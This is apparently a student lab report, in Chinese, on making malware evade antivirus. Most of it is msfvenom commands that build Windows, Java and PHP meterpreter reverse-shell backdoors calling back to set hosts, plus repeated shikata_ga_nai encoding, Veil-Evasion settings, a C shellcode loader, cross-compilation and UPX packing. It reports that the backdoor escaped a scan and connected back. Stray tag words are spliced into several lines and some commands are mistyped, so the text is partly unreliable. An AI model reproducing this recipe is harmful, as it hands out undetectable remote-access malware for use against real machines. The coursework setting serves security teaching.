1.1 正確使用msf編碼器,msfvenom生成如jar之類的其餘文件,veil-evasion,加殼工具,使用shellcode編程php
1.2 經過組合應用各類技術實現惡意代碼免殺java
1.3 用另外一電腦實測,在殺軟開啓的狀況下,可運行並回連成功,註明電腦的殺軟名稱與版本(由於Win10的自帶實時監控殺毒牆,一運行文件就自動刪除,因此沒有作這個加分項)linux
通常是對惡意軟件作處理,讓它不被殺毒軟件所檢測。也是滲透測試中須要使用到的技術。
要作好免殺,就時清楚殺毒軟件(惡意軟件檢測工具)是如何工做的。AV(Anti-virus)是很大一個產業。其中主要的技術人員基本有編制惡意軟件的經驗。shell
反過來也同樣,瞭解了免殺的工具和技術,你也就具備了反制它的基礎。編程
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikataga_nai -i 10 -b ‘\x00’ LHOST=192.168.137.1 LPORT=5237 -f exe >fenix.exe
使用virscan進行掃描,結果以下所示:
windows
使用msf編碼器對後門程序編碼10次
安全
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.137.1 LPORT=5237 -f exe > met-encoded.exe
上傳到virus total試試免殺操做是否有效
網絡
使用Java後門程序生成命令tcp
msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.137.1 lport=5237 x> 20165237_backdoor_java.jar
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.153.135 lport=443 x> 20165237_backdoor.php
use evasion use 7 set Lhost 192.168.153.135 set Lport 5237
而後再輸入後門程序的文件名:payload5237
工具
用virscan看看查殺表現:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.153.135 LPORT=5237 -f c
unsigned char buf[] = 此處省略。 int main() { int (*func)() = (int(*)())buf; func(); }
i686-w64-mingw32-g++ 20165237.c -o 20165237.exe
編譯這個.c文件爲可執行文件;
檢測結果:
upx 20165237.exe -o 20165237plus.exe
使用殺軟掃描桌面文件,沒有報警
運行後門程序,反彈鏈接成功
(因爲Win10自帶的windows defendedr有強制實時監測,因此當點開惡意程序時直接被刪除,致使沒法回連。。想加分都加不了)
一、殺軟是如何檢測出惡意代碼的?
答:基於特徵碼:殺軟會將惡意代碼中有明顯特徵的一部分做爲特徵碼,並創建起特徵庫,在檢測時則比對特徵碼是否匹配。感想: 答:此次實驗讓我感覺到其實殺毒軟件只能殺很常規的病毒或者惡意程序,雖然病毒庫在持續更新,可是總會有未被查出的惡意軟件或者惡意代碼進入到本身的計算機,有一天破壞電腦數據。因此之後必定要注意安全上網,不要訪問非法網站或者點開非法鏈接,說不定點開就會致使惡意軟件的啓動,從而被盜取計算機中的信息!